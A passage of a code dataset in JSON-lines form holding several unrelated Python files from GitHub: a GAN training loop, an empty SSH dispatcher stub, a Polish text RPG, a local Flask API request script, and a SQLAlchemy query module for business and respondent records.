state['loss_G']\n    loss_D = state['loss_D']\n    grad_G = state['grad_G']\n\nelse:\n    start_epoch = 0\n    is_score = []\n    best_is = 0.0\n    loss_G = []\n    loss_D = []\n    grad_G = []\n\nnetIncept = ResNet18()\nnetIncept.to(device)\nnetIncept = torch.nn.DataParallel(netIncept)\nif not torch.cuda.is_available():\n    checkpoint = torch.load('./checkpoint/res18_ckpt_cifar10.t7', map_location=lambda storage, loc: storage)\n    netIncept.load_state_dict(checkpoint['net'])\n    #net_feat.load_state_dict(checkpoint['net'])\n\nelse:\n    checkpoint = torch.load('./checkpoint/res18_ckpt_cifar10.t7')\n    netIncept.load_state_dict(checkpoint['net'])\n    #net_feat.load_state_dict(checkpoint['net'])\n\nprint('-----------NetLoad Finished')\n\npool_size = opt.batch_size * 
opt.pool_size_t\n\n## training placeholder\nz_b = torch.FloatTensor(opt.batch_size, opt.z_dim).to(device)\nimg_b = torch.FloatTensor(opt.batch_size, 3, 32, 32).to(device)\np_z = torch.FloatTensor(pool_size, opt.z_dim).to(device)\np_img = torch.FloatTensor(pool_size, 3, 32, 32).to(device)\nd_b = torch.FloatTensor(opt.batch_size).to(device) # disc label\n\n## evaluation placeholder\nshow_z_b = torch.FloatTensor(64, opt.z_dim).to(device)\neval_z_b = torch.FloatTensor(250, opt.z_dim).to(device) # 250/batch * 120 --> 300000\n\n## fix evaluation place holder\nfix_show_z = torch.FloatTensor(64, opt.z_dim).to(device)\nfix_show_z.normal_()\n\noptim_D = optim.RMSprop(netD.parameters(), lr=opt.lr_d) # other param?\noptim_G = optim.Adam(netG.parameters(), lr=opt.lr_g, betas=(opt.beta1, 0.999)) #?suitable\n#scheduler_D = optim.lr_scheduler.StepLR(optim_D, step_size=200, gamma=.1)\n#scheduler_G = optim.lr_scheduler.StepLR(optim_G, step_size=200, gamma=.1)\n\ncriterion_G = nn.MSELoss()\ncriterion_D = nn.BCEWithLogitsLoss() ## Sigmoid + BCE, input is score\n\nfor epoch in range(start_epoch, start_epoch + opt.num_epoch):\n #print('Start epoch: %d' % epoch)\n ## input_pool: [pool_size, opt.z_dim] -> [pool_size, 32, 32]\n #scheduler_G.step()\n #scheduler_D.step()\n\n netD.train()\n netG.eval()\n p_z.normal_()\n p_img.copy_(netG(p_z).detach())\n\n loss_D_t = []\n loss_G_t = []\n grad_G_t = []\n\n for t in range(opt.period): \n\n for _ in range(opt.dsteps):\n \n t = time.time()\n ### Update D\n netD.zero_grad()\n ## real\n real_img, _ = next(iter(dataloader)) # [batch_size, 1, 32, 32]\n img_b.copy_(real_img.to(device))\n real_D_err = criterion_D(netD(img_b), d_b.fill_(1))\n #real_D_err = torch.log(1 + torch.exp(-netD(img_b))).mean()\n real_D_err.backward()\n\n ## fake\n z_b_idx = random.sample(range(pool_size), opt.batch_size)\n img_b.copy_(p_img[z_b_idx])\n fake_D_err = criterion_D(netD(img_b), d_b.fill_(0))\n #fake_D_err = torch.log(1 + torch.exp(netD(img_b))).mean() # torch scalar[]\n fake_D_err.backward()\n\n loss_D_t.append((real_D_err+fake_D_err).detach().cpu().item())\n #print(loss_D_t[-1])\n #print((real_D_err+fake_D_err).detach().cpu().item())\n optim_D.step()\n\n ## update input pool \n p_img_t = p_img.clone().to(device) ##!!DOUBLE SIZE OF INPUT POOL\n p_img_t.requires_grad_(True)\n if p_img_t.grad is not None:\n p_img_t.grad.zero_()\n fake_D_score = netD(p_img_t)\n fake_D_err = criterion_D(fake_D_score, torch.ones(pool_size).to(device)).detach().cpu().item()\n\n #fake_D_score.backward(torch.ones(pool_size).to(device))\n #p_update = p_img_t.grad * opt.eta\n dsdimg = autograd.grad(outputs=fake_D_score, inputs=p_img_t, \n grad_outputs=torch.ones(pool_size).to(device),\n retain_graph=False)[0]\n p_update = dsdimg * opt.eta\n p_img = img_truncate(p_img + p_update)\n\n loss_G_t.append(fake_D_err)\n grad_G_t.append(np.abs(p_update.detach().cpu().numpy()).mean())\n\n ##update G after several steps\n netG.train()\n netD.eval()\n poolset = PoolSet(p_z.cpu(), p_img.cpu())\n poolloader = torch.utils.data.DataLoader(poolset, batch_size=opt.G_batch_size, shuffle=True)\n\n ## record epoch loss\n loss_G.append(np.mean(loss_G_t))\n loss_D.append(np.mean(loss_D_t))\n grad_G.append(np.mean(grad_G_t)) # ave update / ave #pixels larger than .5\n\n for _ in range(opt.G_epoch):\n\n approx_G_t = []\n for _, data_ in enumerate(poolloader, 0):\n netG.zero_grad()\n\n input_, target_ = data_\n pred_ = netG(input_.to(device))\n loss = criterion_G(pred_, target_.to(device))\n loss.backward()\n\n optim_G.step()\n 
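# The "approximator" step: G is fit by plain MSE regression onto the pool
                # images that were just nudged along the discriminator's gradient,
                # instead of backpropagating through D directly.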
approx_G_t.append(loss.detach().cpu().item())\n\n approx_G = np.mean(approx_G_t)\n\n normD = netD.linear.weight.norm().cpu().item()\n normG= netG.map[1].weight.norm().cpu().item()\n print('[%d], D loss:%.4f, G loss:%.4f, G approx:%.4f, Ave Update:%.4f, G norm:%.4f, D norm:%.4f' \n % (epoch, loss_D[-1], loss_G[-1], approx_G, grad_G[-1], normG , normD))\n\n \n # if epoch % 1 == 0:\n # fig = plt.figure()\n # plt.plot(loss_G, label='approximator loss')\n # plt.xlabel('Epoch, update for each approximator G')\n # plt.legend()\n # fig.savefig('./loss_monitor/Approximator'+ str(epoch).zfill(4) + '.png')\n # plt.close()\n\n # evaluation\n # show image\n if epoch % 20 == 0:\n \n netG.eval()\n show_z_b.normal_()\n ## show eval images\n fake_img = netG(show_z_b) #[N,1,28,28] torch.(cuda).tensor\n vutils.save_image((.5*fake_img+.5).detach().cpu() , './exp/'+ opt.exp + '/results/random/'+str(epoch).zfill(4)+'.png')\n ## show eval fixed images\n fake_img = netG(fix_show_z)\n vutils.save_image((.5*fake_img+.5).detach().cpu(), './exp/'+ opt.exp + '/results/fix/'+str(epoch).zfill(4)+'.png')\n\n # inception, diversity, FID scores.\n if epoch % 25 == 0:\n is_score.append(inception_score(netIncept, netG, device, opt.z_dim))\n with open('./exp/' + opt.exp + '/loss.txt', 'a') as append_File:\n print('[%d], Inception Score:%.4f, D loss:%.4f, G loss:%.4f, G approx:%.4f ,Ave Update:%.4f, G norm:%.4f, D norm:%.4f' \n % (epoch, is_score[-1], loss_D[-1], loss_G[-1], approx_G, grad_G[-1], normG , normD), file=append_File)\n print('IS score: %.4f' % is_score[-1])\n best_is = max(is_score[-1], best_is)\n\n fig = plt.figure()\n plt.plot(25 * (np.arange(epoch//25 + 1)), is_score, label='IS')\n plt.xlabel('Epoch, update for each approximator G')\n plt.legend()\n fig.savefig('./exp/'+ opt.exp +'/InceptionScore.png')\n plt.close()\n\n if best_is == is_score[-1]:\n print('Saving, with best is_score: %.4f' % is_score[-1])\n state = {\n 'netG': netG.state_dict(),\n 'netD': netD.state_dict(),\n 'is_score': is_score,\n 'loss_G': loss_G,\n 'epoch': epoch,\n 'best_is': best_is,\n 'loss_D': loss_D,\n 'grad_G': grad_G\n }\n torch.save(state, './checkpoint/cifar_exp_' + opt.exp +'.t7')\n ## print loss ?","repo_name":"deeplearning-math/deeplearning-math.github.io","sub_path":"2018Fall/Project2/11.GuZhuLiu/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11641,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"43"} +{"seq_id":"74580570369","text":"import sys\n\nfrom Connector.SshTypes import SshTypes\n\n\nclass SshTypeNotFound(Exception):\n \"\"\" SshTypeNotFound \"\"\"\n\n\nclass SshDispatcher:\n @staticmethod\n def dispatchCommand(type: int, args: dict):\n if type == SshTypes.EXECUTE:\n \"\"\" EXECUTE \"\"\"\n elif type == SshTypes.DOWNLOAD_FILE:\n \"\"\" DOWNLOAD_FILE \"\"\"\n elif type == SshTypes.UPLOAD_FILE:\n \"\"\" UPLOAD_FILE \"\"\"\n else:\n raise SshTypeNotFound()\n","repo_name":"IgRich/LaravelUtility","sub_path":"Connector/ssh_helper.py","file_name":"ssh_helper.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33000541655","text":"#===============importy================\r\nfrom random import randint\r\nfrom kartofel import Sklep\r\nfrom kartofel import Zwykły_atak\r\nfrom kartofel import Podwójny_atak\r\nfrom kartofel import Leczenie\r\nfrom kartofel import Leczenie_mala_potka\r\nfrom kartofel import Leczenie_srednia_potka\r\nfrom kartofel import 
Leczenie_duza_potka\r\nfrom kartofel import Wybierzleczenie\r\nfrom kartofel import Upgrade\r\nfrom kartofel import Przeciwnik\r\n\r\n#================hero==================\r\n\r\nbio = {\r\n    \"imie\": None,\r\n    \"maxhp\": 100,\r\n    \"hp\": 100,\r\n    \"poziom\": 1,\r\n    \"coin\": 1000,\r\n    \"enemyhp\": 30,\r\n    \"lvl_miecza\":1, \r\n    \"lvl_zbroji\":1\r\n    }\r\n\r\n\r\n#===============items==================\r\n\r\nshopitems = {\r\n    \"miecz\" : \"miecz\",\r\n    \"zbroja\" : \"zbroja\",\r\n    \"mala_potka\" : \"mala potka\",\r\n    \"srednia_potka\" : \"srednia potka\",\r\n    \"duza_potka\" : \"duza potka\"\r\n    }\r\n\r\n\r\nmyitems = []\r\n\r\n#=============enemy data===============\r\n\r\ndane_przeciwnik={\r\n    \"nazwa\" : None,\r\n    \"enemyatack\" : randint(1,3),\r\n    \"enemycoin\": randint(0,25),\r\n    \"pokonane_bosy\" : 0, \r\n    \"pokonani_przeciwnicy\": 0\r\n}\r\n\r\n\r\n#======================================\r\n\r\nbio[\"imie\"] = input(\"enter your hero's name:\\n\")\r\n\r\ninput(f'\\n{bio[\"imie\"]} You begin your journey')\r\nprint(f\"your stats:\\n\\n {bio}\")\r\n\r\nwhile bio[\"hp\"] > 0:\r\n    bio[\"hp\"] = min(bio[\"hp\"], bio[\"maxhp\"])\r\n    print('-'*50)\r\n    print(f'Your items: {myitems}')\r\n    print(f\"your stats:\\n\\n {bio}\")\r\n    print('1 - fight')\r\n    print('2 - shop\\n\\n')\r\n    inp = input('What do you want to do? ')\r\n    if inp == 'stop':\r\n        break\r\n    elif inp == '1':\r\n        if bio[\"poziom\"] % 5 == 0:\r\n            print('!'*50)\r\n            print('Time to fight the Boss!')\r\n            dane_przeciwnik[\"nazwa\"] = \"boss\"\r\n            bio[\"enemyhp\"] = 40\r\n            while bio[\"enemyhp\"] > 0 and bio[\"hp\"] > 0 :\r\n                Przeciwnik.enemy_atak(bio, dane_przeciwnik)\r\n                w = int(input(\"what do you want to do?\\n\\n 1 - attack\\n2 - healing\"))\r\n                if w == 1:\r\n                    odp = int(input(\"choose an attack\\n\\n 1 - normal attack\\n 2 - double attack\"))\r\n                    if odp == 1:\r\n                        Zwykły_atak(bio)\r\n                    elif odp == 2:\r\n                        Podwójny_atak(bio, myitems)\r\n                elif w == 2:\r\n                    d = int(input())\r\n                    Wybierzleczenie.wybieranieleczenia(d, bio, myitems)\r\n            else:\r\n                if bio[\"enemyhp\"] <= 0 and bio[\"hp\"] >0:\r\n                    Przeciwnik.enemy_atak(bio, dane_przeciwnik)\r\n                    Przeciwnik.enemy_coiny(bio, dane_przeciwnik)\r\n                    bio[\"poziom\"] = bio[\"poziom\"] + 1\r\n                    print(f\"your stats:\\n {bio}\\n\\n defeated bosses:{dane_przeciwnik['pokonane_bosy']}, defeated enemies:{dane_przeciwnik['pokonani_przeciwnicy']}\")\r\n                elif bio[\"enemyhp\"] > 0 and bio[\"hp\"] <= 0:\r\n                    print('you lost')\r\n                    break\r\n\r\n        if bio[\"poziom\"] % 5 != 0:\r\n            print('!'*50)\r\n            print('Time to fight an enemy!')\r\n            dane_przeciwnik[\"nazwa\"] = \"przeciwnik\"\r\n            bio[\"enemyhp\"] = 20\r\n            while bio[\"enemyhp\"] > 0 and bio[\"hp\"] > 0 :\r\n                Przeciwnik.enemy_atak(bio, dane_przeciwnik)\r\n                w = int(input(\"what do you want to do?\\n\\n 1 - attack\\n2 - healing\"))\r\n                if w == 1:\r\n                    odp = int(input(\"choose an attack\\n\\n 1 - normal attack\\n 2 - double attack\"))\r\n                    if odp == 1:\r\n                        Zwykły_atak(bio)\r\n                    elif odp == 2:\r\n                        Podwójny_atak(bio, myitems)\r\n                elif w == 2:\r\n                    d = int(input())\r\n                    Wybierzleczenie.wybieranieleczenia(d, bio, myitems)\r\n            else:\r\n                if bio[\"enemyhp\"] <= 0 and bio[\"hp\"] >0:\r\n                    Przeciwnik.enemy_atak(bio, dane_przeciwnik)\r\n                    Przeciwnik.enemy_coiny(bio, dane_przeciwnik)\r\n                    bio[\"poziom\"] = bio[\"poziom\"] + 1\r\n                    print(f\"your stats:\\n {bio}\\n\\n defeated bosses:{dane_przeciwnik['pokonane_bosy']}, defeated enemies:{dane_przeciwnik['pokonani_przeciwnicy']}\")\r\n                elif bio[\"enemyhp\"] > 0 and bio[\"hp\"] <= 0:\r\n                    print('you lost')\r\n                    break\r\n\r\n    elif inp == \"2\":\r\n        co = input(\"what do you want to do?\\n\\n 1 - buy\\n2 - upgrade\")\r\n        if co == '1':\r\n            Sklep.przedstawienie()\r\n            odp = input(\"decision:\")\r\n            while odp != 'nothing': \r\n                if odp == \"1\":\r\n                    Sklep.kupmiecz(shopitems, bio, myitems)\r\n                    print(odp)\r\n                    odp = input(\"what else: \") \r\n                elif odp == '2':\r\n                    Sklep.kupzbroje(shopitems, bio, myitems)\r\n                    odp = input(\"what else:\")\r\n                elif odp == '3':\r\n                    Sklep.kupmalapotka(shopitems, bio, myitems)\r\n                    odp = input(\"what else: \") \r\n                elif odp =='4':\r\n                    Sklep.kupsredniapotka(shopitems, bio, myitems)\r\n                    odp = input(\"what else: \") \r\n                elif odp == '5':\r\n                    Sklep.kupduzapotka(shopitems, bio, myitems)\r\n                    odp = input(\"what else: \") \r\n\r\n            else:\r\n                Sklep.zakonczenie(myitems)\r\n                print(myitems)\r\n        elif co == '2':\r\n            Upgrade.wybierzulepszenie()\r\n            odpp = input(\"decision:\")\r\n            while odpp != \"nothing\":\r\n                Upgrade.upgrady(odpp, bio, myitems)\r\n                print(bio[\"lvl_miecza\"])\r\n                odpp = input(\"anything else? \")\r\n            else:\r\n                Upgrade.konieculepszaniachyba(bio)\r\n\r\nelse:\r\n    print(bio)\r\n    print(dane_przeciwnik[\"pokonane_bosy\"])\r\n    print(dane_przeciwnik[\"pokonani_przeciwnicy\"])\r\n\r\n\r\n    \r\n","repo_name":"huhhsss/boje-sie-tego-projektu---","sub_path":"rozgryweczka.py","file_name":"rozgryweczka.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20058440638","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 17 16:49:54 2020\n\n@author: Rachit J\n\"\"\"\n\nimport requests\nfrom data_input import data_in\n\nURL = \"http://127.0.0.1:5000/predict\"\n\n# defining a params dict for the parameters to be sent to the API \nheaders = {\"Content-Type\": \"application/json\"} \n\ndata = {\"input\":data_in}\n\n\nr = requests.get(URL, headers = headers, json = data)\n\nr.json()","repo_name":"rachitj/ds_salary_project","sub_path":"FlaskAPI/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"12003935035","text":"import logging\nimport re\n\nimport structlog\nfrom sqlalchemy import and_, distinct, func, or_\nfrom sqlalchemy.sql.functions import count\n\nfrom ras_party.models.models import (\n    Business,\n    BusinessAttributes,\n    BusinessRespondent,\n    Enrolment,\n    EnrolmentStatus,\n    PendingSurveys,\n    Respondent,\n)\nfrom ras_party.support.util import obfuscate_email\n\nlogger = structlog.wrap_logger(logging.getLogger(__name__))\n\n\ndef query_enrolment_by_business_and_survey_and_status(business_id, survey_id, session):\n    \"\"\"\n    Query to return total enrolments against business id and survey id\n    :param business_id: business party id\n    :param survey_id: survey id\n    :param session: db session\n    :return: the enrolment\n    \"\"\"\n    logger.info(\"Querying enrolment by business_id and survey_id\", business_id=business_id, survey_id=survey_id)\n    return (\n        session.query(Enrolment)\n        .filter(Enrolment.business_id == business_id)\n        .filter(Enrolment.survey_id == survey_id)\n        .filter(or_(Enrolment.status == EnrolmentStatus.ENABLED, Enrolment.status == EnrolmentStatus.PENDING))\n    )\n\n\ndef query_pending_surveys_by_business_and_survey(business_id, survey_id, session, is_transfer):\n    \"\"\"\n    Query to return total pending shares against business id and survey id\n    :param business_id: business party id\n    :param survey_id: survey id\n    :param session: db session\n    :param is_transfer: boolean if 
the query is for transfer survey or share survey\n :return: the pending share\n \"\"\"\n logger.info(\"Querying pending share by business_id and survey_id\", business_id=business_id, survey_id=survey_id)\n return (\n session.query(PendingSurveys)\n .filter(PendingSurveys.business_id == business_id)\n .filter(PendingSurveys.survey_id == survey_id)\n .filter(PendingSurveys.is_transfer == is_transfer)\n ) # noqa\n\n\ndef query_businesses_by_party_uuids(party_uuids, session):\n \"\"\"\n Query to return businesses based on party uuids\n\n :param party_uuids: a list of party uuids\n :param session: db session\n :return: the businesses\n \"\"\"\n logger.info(\"Querying businesses by party_uuids\", party_uuids=party_uuids)\n return session.query(Business).filter(Business.party_uuid.in_(party_uuids))\n\n\ndef query_business_by_party_uuid(party_uuid, session):\n \"\"\"\n Query to return business based on party uuid\n\n :param party_uuid: the party uuid\n :return: business or none\n :rtype: Business\n \"\"\"\n logger.info(\"Querying businesses by party_uuid\", party_uuid=party_uuid)\n\n return session.query(Business).filter(Business.party_uuid == party_uuid).first()\n\n\ndef query_business_by_ref(business_ref, session):\n \"\"\"\n Query to return business based on business ref\n :param business_ref: the business ref\n :return: business or none\n :rtype: Business\n \"\"\"\n logger.info(\"Querying businesses by business_ref\", business_ref=business_ref)\n\n return session.query(Business).filter(Business.business_ref == business_ref).first()\n\n\ndef query_business_attributes(business_id, session):\n \"\"\"\n Query to return all business attributes records based\n\n :param business_id: the id of the business\n :param session: A database session\n :return: A list of businessAttributes that match the id\n :rtype: list of BusinessAttributes\n \"\"\"\n logger.info(\"Querying business attributes by id\", business_id=business_id)\n\n return session.query(BusinessAttributes).filter(BusinessAttributes.business_id == business_id).all()\n\n\ndef query_business_attributes_by_sample_summary_id(business_id, sample_summary_id, session):\n \"\"\"\n Query to return all business attributes records based. Will not error if no matches are found.\n\n :param business_id: the id of the business\n :param sample_summary_id: the id of the sample\n :param session: A database session\n :return: A list of businessAttributes that match the query parameters\n :rtype: list of BusinessAttributes\n \"\"\"\n logger.info(\n \"Querying business attributes by id and sample summary\",\n business_id=business_id,\n sample_summary_id=sample_summary_id,\n )\n conditions = [\n BusinessAttributes.business_id == business_id,\n BusinessAttributes.sample_summary_id == sample_summary_id,\n ]\n return session.query(BusinessAttributes).filter(and_(*conditions)).all()\n\n\ndef query_business_attributes_by_collection_exercise(business_id, collection_exercise_uuids, session):\n \"\"\"\n Query to return all business attributes records based. 
Will not error if no matches are found.\n\n :param business_id: the id of the business\n :param collection_exercise_uuids:\n :param session: A database session\n :return: A list of businessAttributes that match the query parameters\n :rtype: list of BusinessAttributes\n \"\"\"\n logger.info(\n \"Querying business attributes by id and collection exercise\",\n business_id=business_id,\n collection_exercise_uuids=collection_exercise_uuids,\n )\n conditions = [\n BusinessAttributes.business_id == business_id,\n BusinessAttributes.collection_exercise.in_(collection_exercise_uuids),\n ]\n return session.query(BusinessAttributes).filter(and_(*conditions)).all()\n\n\ndef query_respondent_by_party_uuids(party_uuids, session):\n \"\"\"\n Query to return respondents based on party uuids\n\n :param party_uuids: the party uuids\n :return: respondents or empty list\n \"\"\"\n logger.info(\"Querying respondents by party_uuids\", party_uuids=party_uuids)\n return session.query(Respondent).filter(Respondent.party_uuid.in_(party_uuids))\n\n\ndef query_respondent_by_names_and_emails(first_name, last_name, email, page, limit, session):\n \"\"\"\n returns respondents which match first_name, last_name and email, ignoring case in all cases\n if any parameter is empty then it is ignored\n\n :param first_name: only return respondents whose first name starts with this first_name\n :param last_name: only return respondents whose last name starts with this last_name\n :param email: only return respondents whose email address contains starts with this email\n :param page: return this page of a result set\n :param limit: max number of records per page\n :param session:\n \"\"\"\n\n logger.info(\"Querying respondents by names and/or email\", email=obfuscate_email(email), page=page, limit=limit)\n\n conditions = []\n\n if first_name:\n conditions.append(Respondent.first_name.ilike(f\"{first_name}%\"))\n if last_name:\n conditions.append(Respondent.last_name.ilike(f\"{last_name}%\"))\n if email:\n conditions.append(Respondent.email_address.ilike(f\"%{email}%\"))\n\n offset = (page - 1) * limit\n\n filtered_records = session.query(Respondent).filter(and_(*conditions))\n\n total_count = filtered_records.count()\n\n return filtered_records.order_by(Respondent.last_name.asc()).offset(offset).limit(limit), total_count\n\n\ndef query_respondent_by_party_uuid(party_uuid, session):\n \"\"\"\n Query to return respondent based on party uuid\n\n :param party_uuid: the party uuid\n :return: respondent or none\n \"\"\"\n logger.info(\"Querying respondents by party_uuid\", party_uuid=party_uuid)\n return session.query(Respondent).filter(Respondent.party_uuid == party_uuid).first()\n\n\ndef query_respondent_by_email(email, session):\n \"\"\"\n Query to return respondent based on email\n\n :param email: the party email\n :return: respondent or none\n \"\"\"\n logger.info(\"Querying respondents by email\")\n return session.query(Respondent).filter(func.lower(Respondent.email_address) == email.lower()).first()\n\n\ndef query_single_respondent_by_email(email, session):\n \"\"\"\n Query to return respondent based on email. 
Must only return 1 result, otherwise it will throw either\n a NoResultFound or MultipleResultsFound exceptions.\n\n :param email: the party email\n :return: single respondent or exception thrown\n \"\"\"\n logger.info(\"Querying respondents by email, expecting exactly one result\")\n return session.query(Respondent).filter(func.lower(Respondent.email_address) == email.lower()).one()\n\n\ndef query_respondent_by_pending_email(email, session):\n \"\"\"\n Query to return respondent based on pending_email_address\n\n :param email: the party uuid\n :return: respondent or none\n \"\"\"\n logger.info(\"Querying respondents by pending email address\")\n return session.query(Respondent).filter(func.lower(Respondent.pending_email_address) == email.lower()).first()\n\n\ndef query_business_respondent_by_respondent_id_and_business_id(business_id, respondent_id, session):\n \"\"\"\n Query to return respondent business associations based on respondent id\n\n :param business_id:\n :param respondent_id:\n :param session:\n :return: business associations for respondent\n \"\"\"\n logger.info(\"Querying business respondent\", respondent_id=respondent_id, business_id=business_id)\n\n response = (\n session.query(BusinessRespondent)\n .filter(and_(BusinessRespondent.business_id == business_id, BusinessRespondent.respondent_id == respondent_id))\n .first()\n )\n return response\n\n\ndef update_respondent_details(respondent_data, respondent_id, session):\n \"\"\"\n Query to return respondent, respondent_data consists of the following parameters: first_name, last_name,\n telephone.\n\n :param respondent_data:\n :param respondent_id: id of the respondent\n :param session:\n :return: True on success, False on failure or if any details are missing\n \"\"\"\n\n logger.info(\"Updating respondent details\", respondent_id=respondent_id)\n respondent_details = query_respondent_by_party_uuid(respondent_id, session)\n\n if (\n respondent_details.first_name != respondent_data[\"firstName\"]\n or respondent_details.last_name != respondent_data[\"lastName\"]\n or respondent_details.telephone != respondent_data[\"telephone\"]\n ):\n session.query(Respondent).filter(Respondent.party_uuid == respondent_id).update(\n {\n Respondent.first_name: respondent_data[\"firstName\"],\n Respondent.last_name: respondent_data[\"lastName\"],\n Respondent.telephone: respondent_data[\"telephone\"],\n }\n )\n\n return True\n return False\n\n\ndef get_respondent_password_verification_token(respondent_id, session):\n \"\"\"\n Query to retrieve the respondent password verification token\n\n :param respondent_id: the id of the respondent\n :param session:\n :returns: verification token\n \"\"\"\n\n logger.info(\"Retrieving respondent verification token\", respondent_id=respondent_id)\n\n response = session.query(Respondent).filter(Respondent.party_uuid == respondent_id).first()\n return response.password_verification_token\n\n\ndef add_respondent_password_verification_token(respondent_id, token, session):\n \"\"\"\n Query to update the respondent password verification tokens\n\n :param respondent_id: id of the respondent\n :param token: the verification token:\n :param session:\n :return: None on success\n \"\"\"\n\n logger.info(\"Adding respondent verification token\", respondent_id=respondent_id)\n\n session.query(Respondent).filter(Respondent.party_uuid == respondent_id).update(\n {Respondent.password_verification_token: token}\n )\n\n\ndef delete_respondent_password_verification_token(respondent_id, session):\n \"\"\"\n Query to update the 
respondent password verification tokens\n\n :param respondent_id: id of the respondent\n :param session:\n :return: None on success\n \"\"\"\n\n logger.info(\"Removing respondent verification token\", respondent_id=respondent_id)\n\n session.query(Respondent).filter(Respondent.party_uuid == respondent_id).update(\n {Respondent.password_verification_token: None}\n )\n\n\ndef query_password_reset_counter(respondent_id, session):\n \"\"\"\n Query to retrieve the respondent's password reset counter\n\n :param respondent_id: id of the respondent\n :param session:\n :return: current number of password reset attempts\n \"\"\"\n\n logger.info(\"Querying password reset counter\", respondent_id=respondent_id)\n\n response = session.query(Respondent).filter(Respondent.party_uuid == respondent_id).first()\n return response.password_reset_counter\n\n\ndef increase_password_reset_counter(respondent_id, counter, session):\n \"\"\"\n Query to increase the respondent's password reset counter\n\n :param respondent_id: id of the respondent\n :param counter: password reset counter\n :param session:\n :return: None on success\n \"\"\"\n\n logger.info(\"Increasing password reset counter\", respondent_id=respondent_id)\n\n session.query(Respondent).filter(Respondent.party_uuid == respondent_id).update(\n {Respondent.password_reset_counter: counter}\n )\n\n\ndef reset_password_reset_counter(respondent_id, session):\n \"\"\"\n Query to reset the respondent's password reset counter\n\n :param respondent_id: id of the respondent\n :param session:\n :return: None on success\n \"\"\"\n\n logger.info(\"Resetting password reset counter\", respondent_id=respondent_id)\n\n session.query(Respondent).filter(Respondent.party_uuid == respondent_id).update(\n {Respondent.password_reset_counter: 0}\n )\n\n\ndef search_business_with_ru_ref(search_query: str, page: int, limit: int, max_rec: int, session):\n \"\"\"\n This query returns business search on ru reference\n :return: list of businesses\n \"\"\"\n bound_logger = logger.bind(search_query=search_query)\n bound_logger.info(\"Query looks like an ru_ref, searching only on ru_ref\")\n offset = (page - 1) * limit\n if search_query.isdigit():\n if len(search_query) == 11:\n bound_logger.info(\"Searching businesses by full ru_ref with search query\")\n result = (\n session.query(BusinessAttributes.name, BusinessAttributes.trading_as, Business.business_ref)\n .select_from(BusinessAttributes)\n .join(Business)\n .filter(Business.business_ref == search_query)\n .distinct()\n .all()\n )\n return result, len(result)\n\n else:\n bound_logger.info(\"Searching businesses by partial ru_ref with search query\")\n pages = (\n session.query(count(distinct(Business.business_ref)))\n .filter(Business.business_ref.ilike(f\"%{search_query}%\"))\n .distinct()\n )\n result = (\n session.query(BusinessAttributes.name, BusinessAttributes.trading_as, Business.business_ref)\n .select_from(BusinessAttributes)\n .join(Business)\n .filter(Business.business_ref.ilike(f\"%{search_query}%\"))\n .order_by(Business.business_ref.asc())\n .distinct()\n .limit(limit)\n .offset(offset)\n )\n estimated_total_records = pages.scalar()\n # we don't want to overload database with the search which retrieves more than 10000 records\n # as it's irrelevant to show so many records as a paginated search on frontend\n # hence this 'if' logic will avoid such searches and frontend will ask the user to refine their search\n if pages.scalar() > max_rec:\n return [], estimated_total_records\n return result, 
estimated_total_records\n\n\ndef search_businesses(search_query: str, page: int, limit: int, max_rec: int, session):\n    \"\"\"\n    Query to return a list of businesses based on keyword search / business names\n    :return: list of businesses\n    \"\"\"\n    bound_logger = logger.bind(search_query=search_query)\n    bound_logger.info(\"Searching businesses by name with search query\")\n    offset = (page - 1) * limit\n    # Direct (exact) search first, else a normal LIKE search\n    regex = re.compile(\"[@_!#$%^&*()<>?/|}{~:]\")\n    if len(search_query.split()) == 1 and regex.search(search_query) is None:\n        direct_pages = (\n            session.query(count(distinct(BusinessAttributes.name)))\n            .filter(\n                and_(\n                    or_(\n                        BusinessAttributes.name.ilike(f\"{search_query}\"),\n                        BusinessAttributes.trading_as.ilike(f\"{search_query}\"),\n                    ),\n                    BusinessAttributes.collection_exercise.isnot(None),\n                )\n            )\n            .distinct()\n        )\n        direct_result = (\n            session.query(BusinessAttributes.name, BusinessAttributes.trading_as, Business.business_ref)\n            .select_from(BusinessAttributes)\n            .join(Business)\n            .filter(\n                and_(\n                    or_(\n                        BusinessAttributes.name.ilike(f\"{search_query}\"),\n                        BusinessAttributes.trading_as.ilike(f\"{search_query}\"),\n                    ),\n                    BusinessAttributes.collection_exercise.isnot(None),\n                )\n            )\n            .order_by(BusinessAttributes.name.asc())\n            .distinct()\n            .limit(limit)\n            .offset(offset)\n        )\n\n        estimated_direct_total = direct_pages.scalar()\n        # we don't want to overload the database with a search which retrieves more than 10000 records\n        # as it's irrelevant to show so many records as a paginated search on the frontend\n        # hence this 'if' logic will avoid such searches and the frontend will ask the user to refine their search\n        if estimated_direct_total > max_rec:\n            return [], estimated_direct_total\n        if estimated_direct_total != 0:\n            return direct_result, estimated_direct_total\n\n    pages = (\n        session.query(count(distinct(BusinessAttributes.name)))\n        .filter(\n            and_(\n                or_(\n                    BusinessAttributes.name.ilike(f\"%{search_query}%\"),\n                    BusinessAttributes.trading_as.ilike(f\"%{search_query}%\"),\n                ),\n                BusinessAttributes.collection_exercise.isnot(None),\n            )\n        )\n        .distinct()\n    )\n    result = (\n        session.query(BusinessAttributes.name, BusinessAttributes.trading_as, Business.business_ref)\n        .select_from(BusinessAttributes)\n        .join(Business)\n        .filter(\n            and_(\n                or_(\n                    BusinessAttributes.name.ilike(f\"%{search_query}%\"),\n                    BusinessAttributes.trading_as.ilike(f\"%{search_query}%\"),\n                ),\n                BusinessAttributes.collection_exercise.isnot(None),\n            )\n        )\n        .order_by(BusinessAttributes.name.asc())\n        .distinct()\n        .limit(limit)\n        .offset(offset)\n    )\n    estimated_total_records = pages.scalar()\n    # we don't want to overload the database with a search which retrieves more than 10000 records\n    # as it's irrelevant to show so many records as a paginated search on the frontend\n    # hence this 'if' logic will avoid such searches and the frontend will ask the user to refine their search\n    if estimated_total_records > max_rec:\n        return [], estimated_total_records\n    return result, 